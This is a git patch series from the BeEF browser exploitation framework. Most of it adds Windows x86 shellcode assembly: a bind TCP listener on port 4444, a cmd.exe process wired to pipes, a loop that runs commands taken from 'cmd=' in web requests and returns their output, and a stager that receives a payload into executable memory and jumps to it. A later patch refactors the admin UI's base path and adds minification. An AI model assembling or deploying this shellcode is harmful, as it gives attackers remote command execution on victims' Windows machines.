+  pop esi		 ; restore buffer pointer
+  mov [esi], edi	 ; save external socket to buffer
+
+
+recv:                    ; Receive the web request - must be a post request with command ending with a new line character
+  push byte 0            ; flags
+  push 0x400             ; allocated space for command (512 bytes)
+  mov ebx, esi           ; start of our request/response memory buffer
+  add ebx, 8		 ; start of our allocated command space
+  push ebx               ; start of our allocated command space
+  push dword [esi]       ; external socket
+  push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
+  call ebp               ; recv( external_socket, buffer, size, 0 );
+
+find_cmd:  		 ; Search for "cmd=" in the web request
+  mov edx, [esp+0x64]    ; stage stdin read file descriptor (40)
+  mov ecx, 0x400         ; set ecx to be our buffer counter
+next:
+  cmp dword [ebx], 0x3d646d63   ; check if ebx points to "cmd="
+  jz cmd_found           ; if we found "cmd=" then parse the command
+  inc ebx                ; point ebx to next char in request data
+  dec ecx                ; dec our buffer counter
+  jecxz read_file_check  ; if our counter is 0 then we found no command, so recv more data
+  jmp short next         ; check next location for "cmd="
+cmd_found:               ; now pointing to start of our command - MAY fail if the command is cut off
+  add ebx, 0x03          ; starts off pointing at "cmd=" so add 3 (plus  inc eax below) to point to command
+
+next_cmd_char:
+  inc ebx                ; move our command string pointer up one character
+  push ebx               ; save command pointer to the stack
+
+write_file:
+  push 0		 ; pOverlapped = NULL
+  lea edi,[esi+1040]	 ; 4 bytes for bytes written
+  push edi		 ; pBytesWritten
+  push 1		 ; nBytesToWrite
+  push ebx		 ; command string in buffer
+  mov ebx,[esp+70h]	 ; Child stdin
+  push ebx		 ; child stdin
+  push 0x5BAE572D	 ; hash(kernel32.dll, WriteFile)
+  call ebp		 ; WriteFile
+
+  pop ebx                ; restore command pointer from the stack
+  cmp byte [ebx], 0x0a   ; check if we have just sent a new line
+  jnz next_cmd_char      ; if we haven't finished sending the cmd then send the next char, else we want to read the cmd output from internal stage socket
+
+
+%include "src/block_sleep.asm"
+			 ; Input: None
+			 ; Output: None. Sleeps for x seconds
+			 ; Clobbers: None
+
+read_file_check:
+  xor eax, eax		 ; zero eax
+  push eax		 ; lpBytesLeftThisMessage
+  lea ebx,[esi+4]	 ; address to output the result - num bytes available to read
+  push ebx		 ; lpTotalBytesAvail
+  push eax		 ; lpBytesRead
+  push eax		 ; nBufferSize
+  push eax		 ; lpBuffer
+  lea ebx,[esp+74h]	 ; child stdout read address
+  mov ebx, [ebx]	 ; child stdout read file descriptor
+  push ebx               ; hNamedPipe
+  push 0xB33CB718	 ; hash(kernel32.dll,PeekNamedPipe)
+  call ebp		 ; PeekNamedPipe
+
+  test eax, eax		 ; check the function return correctly
+  jz close_handle	 ; no, then close the connection and start again
+  mov eax, [esi+4]	 ; Grab the number of bytes available
+  test eax, eax		 ; check for no bytes to read
+  jz close_handle	 ; no, then close the connection and start again
+
+read_file:
+  push 0                 ; pOverlapped = NULL
+  lea edi,[esi+1044]     ; output: number of bytes read
+  push edi               ; pBytesRead
+  push 0xB86             ; BytesToRead: remaining space in our allocated buffer
+  ;lea edi,[esi+1114]     ; start of remaining space in buffer after response headers
+  lea edi,[esi+1146]     ; start of remaining space in buffer after response headers
+  push edi               ; start of remaining space in buffer after response headers
+  lea ebx,[esp+70h]	 ; child stdout read address
+  mov ebx, [ebx]	 ; child stdout read file descriptor
+  push ebx               ; hFile: child stdout address
+  push 0xBB5F9EAD	 ; hash(kernel32.dll,ReadFile)
+  call ebp               ; ReadFile
+
+
+send_output:             ; send buffer to the external socket
+  push byte 0            ; flags
+  push 0xBE8             ; len
+  lea edi,[esi+1048]     ; start of output buffer
+  push edi               ; pointer to buffer
+  push dword [esi]       ; external socket
+  push 0x5F38EBC2        ; hash ( "ws2_32.dll", "send" )
+  call ebp               ; send(external_socket, *buf, len, flags);
+
+
+close_handle:
+  push dword [esi]	 ; hObject: external socket
+  push 0x528796C6	 ; hash(kernel32.dll,CloseHandle)
+  call ebp		 ; CloseHandle
+
+  jmp ReadLoop
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm
new file mode 100644
index 000000000..50059ad2e
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_beef_bind-stager.asm
@@ -0,0 +1,47 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+;INPUT: EBP is block_api.
+
+%include "src/block_bind_tcp.asm"       ;by here we will have performed the bind_tcp connection to setup our external web socket
+			 ; Input: EBP must be the address of 'api_call'.
+			 ; Output: EDI will be the newly connected clients socket
+			 ; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+%include "src/block_virtualalloc.asm"
+			 ; Input: None
+			 ; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX has value 0x1000
+			 ; Clobbers: EAX, EBX, ECX, EDX
+
+  mov esi, eax		 ; save pointer to buffer since eax gets clobbered
+
+recv:                    ; Receive the web request containing the stage
+  push byte 0		 ; flags
+  push ebx		 ; allocated space for stage
+  push eax		 ; start of our allocated command space
+  push edi		 ; external socket
+  push 0x5FC8D902        ; hash( "ws2_32.dll", "recv" )
+  call ebp               ; recv( external_socket, buffer, size, 0 );
+
+
+close_handle:
+  push edi		 ; hObject: external socket
+  push 0x528796C6	 ; hash(kernel32.dll,CloseHandle)
+  call ebp		 ; CloseHandle
+
+find_cmd:		 ; Search for "cmd=" in the web request for our payload
+  cmp dword [esi], 0x3d646d63   ; check if ebx points to "cmd="
+  jz cmd_found           ; if we found "cmd=" then parse the command
+  inc esi                ; point ebx to next char in request data
+  jmp short find_cmd     ; check next location for "cmd="
+cmd_found:               ; now pointing to start of our command - MAY fail if the command is cut off
+;  add esi,4              ; starts off pointing at "cmd=" so add 3 (plus  inc eax below) to point to command ... this compiles to 6 byte opcode
+  db 0x83, 0xC6, 0x04	 ; add esi,4 ... but only 3 byte opcode
+
+  jmp esi		 ; jump to our stage payload
+
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm
new file mode 100644
index 000000000..3ac5f8c70
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_bind_tcp.asm
@@ -0,0 +1,63 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer@harmonysecurity.com)
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (24 July 2009)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP must be the address of 'api_call'.
+; Output: EDI will be the newly connected clients socket
+; Clobbers: EAX, EBX, ESI, EDI, ESP will also be modified (-0x1A0)
+
+bind_tcp:
+  push 0x00003233        ; Push the bytes 'ws2_32',0,0 onto the stack.
+  push 0x5F327377        ; ...
+  push esp               ; Push a pointer to the "ws2_32" string on the stack.
+  push 0x0726774C        ; hash( "kernel32.dll", "LoadLibraryA" )
+  call ebp               ; LoadLibraryA( "ws2_32" )
+  
+  mov eax, 0x0190        ; EAX = sizeof( struct WSAData )
+  sub esp, eax           ; alloc some space for the WSAData structure
+  push esp               ; push a pointer to this stuct
+  push eax               ; push the wVersionRequested parameter
+  push 0x006B8029        ; hash( "ws2_32.dll", "WSAStartup" )
+  call ebp               ; WSAStartup( 0x0190, &WSAData );
+  
+  push eax               ; if we succeed, eax wil be zero, push zero for the flags param.
+  push eax               ; push null for reserved parameter
+  push eax               ; we do not specify a WSAPROTOCOL_INFO structure
+  push eax               ; we do not specify a protocol
+  inc eax                ;
+  push eax               ; push SOCK_STREAM
+  inc eax                ;
+  push eax               ; push AF_INET
+  push 0xE0DF0FEA        ; hash( "ws2_32.dll", "WSASocketA" )
+  call ebp               ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+  xchg edi, eax          ; save the socket for later, don't care about the value of eax after this
+  
+  xor ebx, ebx           ; Clear EBX
+  push ebx               ; bind to 0.0.0.0
+  push 0x5C110002        ; family AF_INET and port 4444
+  mov esi, esp           ; save a pointer to sockaddr_in struct
+  push byte 16           ; length of the sockaddr_in struct (we only set the first 8 bytes as the last 8 are unused)
+  push esi               ; pointer to the sockaddr_in struct
+  push edi               ; socket
+  push 0x6737DBC2        ; hash( "ws2_32.dll", "bind" )
+  call ebp               ; bind( s, &sockaddr_in, 16 );
+
+  push ebx               ; backlog
+  push edi               ; socket
+  push 0xFF38E9B7        ; hash( "ws2_32.dll", "listen" )
+  call ebp               ; listen( s, 0 );
+
+  push ebx               ; we set length for the sockaddr struct to zero
+  push ebx               ; we dont set the optional sockaddr param
+  push edi               ; listening socket
+  push 0xE13BEC74        ; hash( "ws2_32.dll", "accept" )
+  call ebp               ; accept( s, 0, 0 );
+  
+  push edi               ; push the listening socket to close
+  xchg edi, eax          ; replace the listening socket with the new connected socket for further comms
+  push 0x614D6E75        ; hash( "ws2_32.dll", "closesocket" )
+  call ebp               ; closesocket( s );
+  
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm
new file mode 100644
index 000000000..941564c34
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_pipes.asm
@@ -0,0 +1,64 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: EBP is api_call
+; Output:
+;       esp+00	child stdin  read  file descriptor (inherited)
+;       esp+04	child stdin  write file descriptor (not inherited)
+;       esp+08	child stdout read  file descriptor (not inherited)
+;       esp+12	child stdout write file descriptor (inherited)
+;       esp+16	lpPipeAttributes structure (not used after block - 12 bytes)
+; Clobbers: EAX, EBX, ECX, EDI, ESP will decrement by 28 bytes
+
+  push 1		 ; create lpPipeAtrributes structure on stack so pipe handles are inherited
+  push 0
+  push 0x0C
+
+create_pipe_stdout:
+  push 0		 ; allocate space on stack for child stdout file descriptor
+  mov ebx, esp		 ; save location of where the child stdout Write file descriptor will be
+  push 0		 ; allocate space on stack for child stdout file descriptor
+  mov ecx, esp		 ; save location of where the child stdout Read file descriptor will be
+
+  push 0                 ; nSize
+  lea edi,[esp+12]	 ; lpPipeAttributes - inherited
+  push edi
+  push ebx               ; stdout write file descriptor
+  push ecx               ; stdout read file descriptor
+  push 0x0EAFCF3E        ; hash ( "kernel.dll", "CreatePipe" )
+  call ebp               ; CreatePipe( Read, Write, 0, 0 )
+
+create_pipe_stdin:
+  push 0		; allocate space on stack for child stdout file descriptor
+  mov ebx, esp		; save location of where the child stdout Write file descriptor will be
+  push 0		; allocate space on stack for child stdout file descriptor
+  mov ecx, esp		; save location of where the child stdout Read file descriptor will be
+
+  push 0                 ; nSize
+  lea edi,[esp+20]	 ; lpPipeAttributes - inherited
+  push edi
+  push ebx               ; stdout write file descriptor
+  push ecx               ; stdout read file descriptor
+  push 0x0EAFCF3E        ; hash ( "kernel.dll", "CreatePipe" )
+  call ebp               ; CreatePipe( Read, Write, 0, 0 )
+
+no_inherit_read_handle:	 ; ensure read and write handles to child proc pipes for are not inherited
+  mov ebx,[esp+8] 
+  push 0
+  push 1
+  push ebx		 ; hChildStdoutRd is the address we set in the CreatePipe call
+  push 0x1CD313CA	 ; hash(kernel32.dll, SetHandleInformation)
+  call ebp		 ; SetHandleInformation
+
+no_inherit_write_handle:
+  mov ebx,[esp+4]
+  push 0
+  push 1
+  push ebx		 ; hChildStdinRw is the address we set in the CreatePipe call
+  push 0x1CD313CA	 ; hash(kernel32.dll, SetHandleInformation)
+  call ebp	 	 ; SetHandleInformation
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm
new file mode 100644
index 000000000..33e807866
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_shell_pipes.asm
@@ -0,0 +1,56 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Credits: Some code borrowed from block_shell.asm; Stephen Fewer
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input:
+;	EBP is api_call
+;       esp+00  child stdin  read  file descriptor (inherited)
+;       esp+04  not used
+;       esp+08  not used
+;       esp+12  child stdout write file descriptor (inherited)
+; Output: None.
+; Clobbers: EAX, EBX, ECX, EDX, ESI, ESP will also be modified
+
+shell:
+  push 0x00646D63        ; push our command line: 'cmd',0
+  mov ebx, esp           ; save a pointer to the command line
+  push dword [esp+16]	 ; child stdout write file descriptor for process stderr
+  push dword [esp+20]	 ; child stdout write file descriptor for process stdout
+  push dword [esp+12]	 ; child stdin read file descriptor for process stdout
+  xor esi, esi           ; Clear ESI for all the NULL's we need to push
+  push byte 18           ; We want to place (18 * 4) = 72 null bytes onto the stack
+  pop ecx                ; Set ECX for the loop
+push_loop:               ;
+  push esi               ; push a null dword
+  loop push_loop         ; keep looping untill we have pushed enough nulls
+  mov word [esp + 60], 0x0101 ; Set the STARTUPINFO Structure's dwFlags to STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
+  lea eax, [esp + 16]    ; Set EAX as a pointer to our STARTUPINFO Structure
+  mov byte [eax], 68     ; Set the size of the STARTUPINFO Structure
+  ; perform the call to CreateProcessA
+  push esp               ; Push the pointer to the PROCESS_INFORMATION Structure 
+  push eax               ; Push the pointer to the STARTUPINFO Structure
+  push esi               ; The lpCurrentDirectory is NULL so the new process will have the same current directory as its parent
+  push esi               ; The lpEnvironment is NULL so the new process will have the same enviroment as its parent
+  push esi               ; We dont specify any dwCreationFlags 
+  inc esi                ; Increment ESI to be one
+  push esi               ; Set bInheritHandles to TRUE in order to inheritable all possible handle from the parent
+  dec esi                ; Decrement ESI back down to zero
+  push esi               ; Set lpThreadAttributes to NULL
+  push esi               ; Set lpProcessAttributes to NULL
+  push ebx               ; Set the lpCommandLine to point to "cmd",0
+  push esi               ; Set lpApplicationName to NULL as we are using the command line param instead
+  push 0x863FCC79        ; hash( "kernel32.dll", "CreateProcessA" )
+  call ebp               ; CreateProcessA( 0, &"cmd", 0, 0, TRUE, 0, 0, 0, &si, &pi );
+  ; perform the call to WaitForSingleObject
+;  mov eax, esp           ; save pointer to the PROCESS_INFORMATION Structure
+;  dec esi                ; Decrement ESI down to -1 (INFINITE)
+;  push esi               ; push INFINITE inorder to wait forever
+;  inc esi                ; Increment ESI back to zero
+;  push dword [eax]       ; push the handle from our PROCESS_INFORMATION.hProcess
+;  push 0x601D8708        ; hash( "kernel32.dll", "WaitForSingleObject" )
+;  call ebp               ; WaitForSingleObject( pi.hProcess, INFINITE );
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm
new file mode 100644
index 000000000..4d3b57ce2
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_sleep.asm
@@ -0,0 +1,15 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: None
+; Output: None. Sleeps for specified seconds.
+; Clobbers: None
+
+  push 1000                       ; milliseconds
+  push 0xE035F044                 ; hash (kernel32.dll, Sleep)
+  call ebp                        ; Sleep(1000ms)
+
diff --git a/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm
new file mode 100644
index 000000000..f12b2f17c
--- /dev/null
+++ b/modules/exploits/beefbind/beef_bind_staged_deploy/shellcode_sources/windows/src/block_virtualalloc.asm
@@ -0,0 +1,20 @@
+;-----------------------------------------------------------------------------;
+; Author: Ty Miller @ Threat Intelligence
+; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Version: 1.0 (2nd December 2011)
+;-----------------------------------------------------------------------------;
+[BITS 32]
+
+; Input: None
+; Output: EAX holds pointer to the start of buffer 0x1000 bytes, EBX holds value 0x1000
+; Clobbers: EAX, EBX, ECX, EDX
+
+  mov ebx,0x1000	 ; setup our flags and buffer size in ebx
+allocate_memory:         ; Alloc a buffer for the request and response data
+  push byte 0x40         ; PAGE_EXECUTE_READWRITE - don't need execute but may as well
+  push ebx               ; MEM_COMMIT
+  push ebx               ; size of memory to be allocated (4096 bytes)
+  push byte 0            ; NULL as we dont care where the allocation is
+  push 0xE553A458        ; hash( "kernel32.dll", "VirtualAlloc" )
+  call ebp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
+

From 86d23d3815222cad981f20f6a7e0036a236bf7eb Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Tue, 1 Oct 2013 17:16:46 +0100
Subject: [PATCH 375/397] Fix issue #662 the Web UI base path can now be
 configured in the main config.yaml. Web UI JS files are now also minified.

---
 Gemfile                                       |  1 +
 config.yaml                                   |  2 +-
 core/main/client/browser.js                   |  8 +--
 core/main/console/banners.rb                  |  2 +-
 core/main/router/router.rb                    |  5 +-
 extensions/admin_ui/api/handler.rb            | 70 ++++++++++++++++---
 extensions/admin_ui/classes/httpcontroller.rb | 26 ++++---
 .../controllers/authentication/index.html     |  4 +-
 .../admin_ui/controllers/panel/index.html     | 43 +-----------
 .../admin_ui/media/javascript-min/readme      |  2 +
 .../javascript/esapi/jquery-encoder-0.1.0.js  |  5 +-
 .../admin_ui/media/javascript/ext-beef.js     | 36 ----------
 .../media/javascript/ui/authentication.js     |  2 +-
 .../media/javascript/ui/common/beef_common.js |  2 +-
 .../media/javascript/ui/panel/Logout.js       |  4 +-
 .../media/javascript/ui/panel/MainPanel.js    |  2 +-
 .../media/javascript/ui/panel/PanelViewer.js  |  4 +-
 .../media/javascript/ui/panel/WelcomeTab.js   |  2 +-
 .../media/javascript/ui/panel/ZombiesMgr.js   |  6 +-
 .../media/javascript/ui/panel/common.js       | 14 ++--
 .../ui/panel/tabs/ZombieTabAutorun.js         |  2 +-
 .../ui/panel/tabs/ZombieTabCommands.js        |  4 +-
 .../ui/panel/tabs/ZombieTabDetails.js         |  2 +-
 .../javascript/ui/panel/tabs/ZombieTabLogs.js |  2 +-
 .../ui/panel/tabs/ZombieTabRider.js           | 10 +--
 .../ui/panel/tabs/ZombieTabXssRays.js         |  4 +-
 .../javascript/ui/panel/zombiesTreeList.js    |  4 +-
 .../media/javascript/wterm/wterm.jquery.js    |  3 +
 extensions/demos/html/basic.html              |  2 -
 extensions/evasion/obfuscation/minify.rb      |  4 +-
 30 files changed, 134 insertions(+), 143 deletions(-)
 create mode 100644 extensions/admin_ui/media/javascript-min/readme
 delete mode 100644 extensions/admin_ui/media/javascript/ext-beef.js

diff --git a/Gemfile b/Gemfile
index 618ef7ca6..3a505922b 100644
--- a/Gemfile
+++ b/Gemfile
@@ -17,6 +17,7 @@ gem "sinatra", "1.4.2"
 gem "rack", "1.5.2"
 gem "em-websocket", "~> 0.3.6"
 gem "jsmin", "~> 1.0.1"
+gem "uglifier", "~> 2.2.1"
 gem "ansi"
 gem "term-ansicolor", :require => "term/ansicolor"
 gem "dm-core"
diff --git a/config.yaml b/config.yaml
index 490ebe0de..42055a5e2 100644
--- a/config.yaml
+++ b/config.yaml
@@ -30,7 +30,7 @@ beef:
         # DNS
         dns_host: "localhost"
         dns_port: 53
-        panel_path: "/ui/panel"
+        web_ui_basepath: "/ui"
         hook_file: "/hook.js"
         hook_session_name: "BEEFHOOK"
         session_cookie_name: "BEEFSESSION"
diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 05409d10c..b783619a5 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1325,11 +1325,11 @@ beef.browser = {
      */
     javaEnabled:function () {
         //Use of deployJava defined in deployJava.js (Oracle java deployment toolkit)
-        versionJRE = deployJava.getJREs();
+        // versionJRE = deployJava.getJREs();
 
-        if(versionJRE != '')
-            return true;
-         else
+        // if(versionJRE != '')
+        //     return true;
+        //  else
             return false;
 
     },
diff --git a/core/main/console/banners.rb b/core/main/console/banners.rb
index 71aea366e..c4e1a620f 100644
--- a/core/main/console/banners.rb
+++ b/core/main/console/banners.rb
@@ -86,7 +86,7 @@ module Banners
         print_success "running on network interface: #{host}"
         beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
         data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
-        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
+        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
         
         print_more data
       end
diff --git a/core/main/router/router.rb b/core/main/router/router.rb
index c6ca5c6e5..e2502b4da 100644
--- a/core/main/router/router.rb
+++ b/core/main/router/router.rb
@@ -114,6 +114,7 @@ module BeEF
         # @note Default root page
         get "/" do
           if config.get("beef.http.web_server_imitation.enable")
+            bp = config.get "beef.http.web_ui_basepath"
             type = config.get("beef.http.web_server_imitation.type")
             case type
               when "apache"
@@ -209,7 +210,7 @@ module BeEF
                     "<h2>If you are the website administrator:</h2>" +
                     "<p>You may now add content to the directory <tt>/var/www/html/</tt>. Note that until you do so, people visiting your website will see this page and not your content. To prevent this page from ever being used, follow the instructions in the file <tt>/etc/httpd/conf.d/welcome.conf</tt>.</p>" +
                     "<p>You are free to use the images below on Apache and CentOS Linux powered HTTP servers.  Thanks for using Apache and CentOS!</p>" +
-                    "<p><a href=\"http://httpd.apache.org/\"><img src=\"/ui/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"/ui/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
+                    "<p><a href=\"http://httpd.apache.org/\"><img src=\"#{bp}/media/images/icons/apache_pb.gif\" alt=\"[ Powered by Apache ]\"/></a> <a href=\"http://www.centos.org/\"><img src=\"#{bp}/media/images/icons/powered_by_rh.png\" alt=\"[ Powered by CentOS Linux ]\" width=\"88\" height=\"31\" /></a></p>" +
                     "</div>" +
                     "</div>" +
                     "</div>" +
@@ -234,7 +235,7 @@ module BeEF
                     "<table>" +
                     "<tr>" +
                     "<td ID=tableProps width=70 valign=top align=center>" +
-                    "<img ID=pagerrorImg src=\"/ui/media/images/icons/pagerror.gif\" width=36 height=48>" +
+                    "<img ID=pagerrorImg src=\"#{bp}/media/images/icons/pagerror.gif\" width=36 height=48>" +
                     "<td ID=tablePropsWidth width=400>" +
                     "<h1 ID=errortype style=\"font:14pt/16pt verdana; color:#4e4e4e\">" +
                     "<P ID=Comment1><!--Problem--><P ID=\"errorText\">Under Construction</h1>" +
diff --git a/extensions/admin_ui/api/handler.rb b/extensions/admin_ui/api/handler.rb
index 12358426f..446a46845 100644
--- a/extensions/admin_ui/api/handler.rb
+++ b/extensions/admin_ui/api/handler.rb
@@ -12,40 +12,90 @@ module API
   # We use this module to register all the http handler for the Administrator UI
   #
   module Handler
-    
+    require 'uglifier'
+
     BeEF::API::Registrar.instance.register(BeEF::Extension::AdminUI::API::Handler, BeEF::API::Server, 'mount_handler')
-    
+
+    def self.evaluate_and_minify(content, params, name)
+      erubis = Erubis::FastEruby.new(content)
+      evaluated = erubis.evaluate(params)
+      minified = Uglifier.compile(evaluated)
+      write_to = File.new("#{File.dirname(__FILE__)}/../media/javascript-min/#{name}.js", "w+")
+      File.open(write_to, 'w') { |file| file.write(minified) }
+
+      File.path write_to
+    end
+
+    def self.build_javascript_ui(beef_server)
+      auth_js_file = File.read(File.dirname(__FILE__)+'/../media/javascript/ui/authentication.js') + "\n\n"
+      js_files = ""
+
+      #NOTE: order counts! make sure you know what you're doing if you add files
+      esapi = %w(esapi/Class.create.js esapi/jquery-1.6.4.min.js esapi/jquery-encoder-0.1.0.js)
+      ux =  %w(ui/common/beef_common.js ux/PagingStore.js ux/StatusBar.js ux/TabCloseMenu.js)
+      panel = %w(ui/panel/common.js ui/panel/DistributedEngine.js ui/panel/PanelStatusBar.js ui/panel/tabs/ZombieTabDetails.js ui/panel/tabs/ZombieTabLogs.js ui/panel/tabs/ZombieTabCommands.js ui/panel/tabs/ZombieTabRider.js ui/panel/tabs/ZombieTabXssRays.js wterm/wterm.jquery.js ui/panel/tabs/ZombieTabIpec.js ui/panel/tabs/ZombieTabAutorun.js ui/panel/PanelViewer.js ui/panel/DataGrid.js ui/panel/MainPanel.js ui/panel/ZombieTab.js ui/panel/ZombieTabs.js ui/panel/zombiesTreeList.js ui/panel/ZombiesMgr.js ui/panel/Logout.js ui/panel/WelcomeTab.js)
+
+      global_js = esapi + ux + panel
+
+      global_js.each do |file|
+        js_files << File.read(File.dirname(__FILE__)+'/../media/javascript/'+file) + "\n\n"
+      end
+
+      config = BeEF::Core::Configuration.instance
+      bp = config.get "beef.http.web_ui_basepath"
+
+      # if more dynamic variables are needed in JavaScript files
+      # add them here in the following Hash
+      params = {
+       'base_path' => bp
+      }
+
+      # process all JavaScript files, evaluating them with Erubis
+      web_ui_all = self.evaluate_and_minify(js_files, params, 'web_ui_all')
+      web_ui_auth = self.evaluate_and_minify(auth_js_file, params, 'web_ui_auth')
+
+      beef_server.mount("#{bp}/web_ui_all.js", Rack::File.new(web_ui_all))
+      beef_server.mount("#{bp}/web_ui_auth.js", Rack::File.new(web_ui_auth))
+
+    end
+
     #
     # This function gets called automatically by the server.
     #
     def self.mount_handler(beef_server)
-      # retrieve the configuration class instance
-      configuration = BeEF::Core::Configuration.instance
-      
+      config = BeEF::Core::Configuration.instance
+
+      # Web UI base path, like http://beef_domain/<bp>/panel
+      bp = config.get "beef.http.web_ui_basepath"
+
       # registers the http controllers used by BeEF core (authentication, logs, modules and panel)
       Dir["#{$root_dir}/extensions/admin_ui/controllers/**/*.rb"].each do |http_module|
         require http_module
         mod_name = File.basename http_module, '.rb'
-        beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
+        beef_server.mount("#{bp}/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
       end
 
       # registers the http controllers used by BeEF extensions (requester, proxy, xssrays, etc..)
       Dir["#{$root_dir}/extensions/**/controllers/*.rb"].each do |http_module|
         require http_module
         mod_name = File.basename http_module, '.rb'
-        beef_server.mount("/ui/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
+        beef_server.mount("#{bp}/#{mod_name}", BeEF::Extension::AdminUI::Handlers::UI.new(mod_name))
       end
       
       # mount the folder were we store static files (javascript, css, images) for the admin ui
       media_dir = File.dirname(__FILE__)+'/../media/'
-      beef_server.mount('/ui/media', Rack::File.new(media_dir))
+      beef_server.mount("#{bp}/media", Rack::File.new(media_dir))
 
       
       # mount the favicon file, if we're not imitating a web server.
-      if !configuration.get("beef.http.web_server_imitation.enable")
-        beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{configuration.get("beef.extension.admin_ui.favicon_dir")}/#{configuration.get("beef.extension.admin_ui.favicon_file_name")}"))
+      if !config.get("beef.http.web_server_imitation.enable")
+        beef_server.mount('/favicon.ico', Rack::File.new("#{media_dir}#{config.get("beef.extension.admin_ui.favicon_dir")}/#{config.get("beef.extension.admin_ui.favicon_file_name")}"))
       end
+
+      self.build_javascript_ui beef_server
     end
+
+
     
   end
   
diff --git a/extensions/admin_ui/classes/httpcontroller.rb b/extensions/admin_ui/classes/httpcontroller.rb
index da9cd9dbf..204fc62e9 100644
--- a/extensions/admin_ui/classes/httpcontroller.rb
+++ b/extensions/admin_ui/classes/httpcontroller.rb
@@ -40,8 +40,12 @@ module AdminUI
     def run(request, response)
       @request = request
       @params = request.params
-      @session = BeEF::Extension::AdminUI::Session.instance      
-      auth_url = '/ui/authentication'
+      @session = BeEF::Extension::AdminUI::Session.instance
+      config = BeEF::Core::Configuration.instance
+
+      # Web UI base path, like http://beef_domain/<bp>/panel
+      @bp = config.get "beef.http.web_ui_basepath"
+      auth_url = "#{@bp}/authentication"
       
       # test if session is unauth'd and whether the auth functionality is requested
       if not @session.valid_session?(@request) and not self.class.eql?(BeEF::Extension::AdminUI::Controllers::Authentication)
@@ -78,14 +82,14 @@ module AdminUI
 
     end
 
-    # Constructs a redirect script
-    def script_redirect(location) "<script> document.location=\"#{location}\"</script>" end
-    
-    # Constructs a html script tag
-    def script_tag(filename) "<script src=\"#{$url}/ui/media/javascript/#{filename}\" type=\"text/javascript\"></script>" end
-    
+    # Constructs a html script tag (from media/javascript directory)
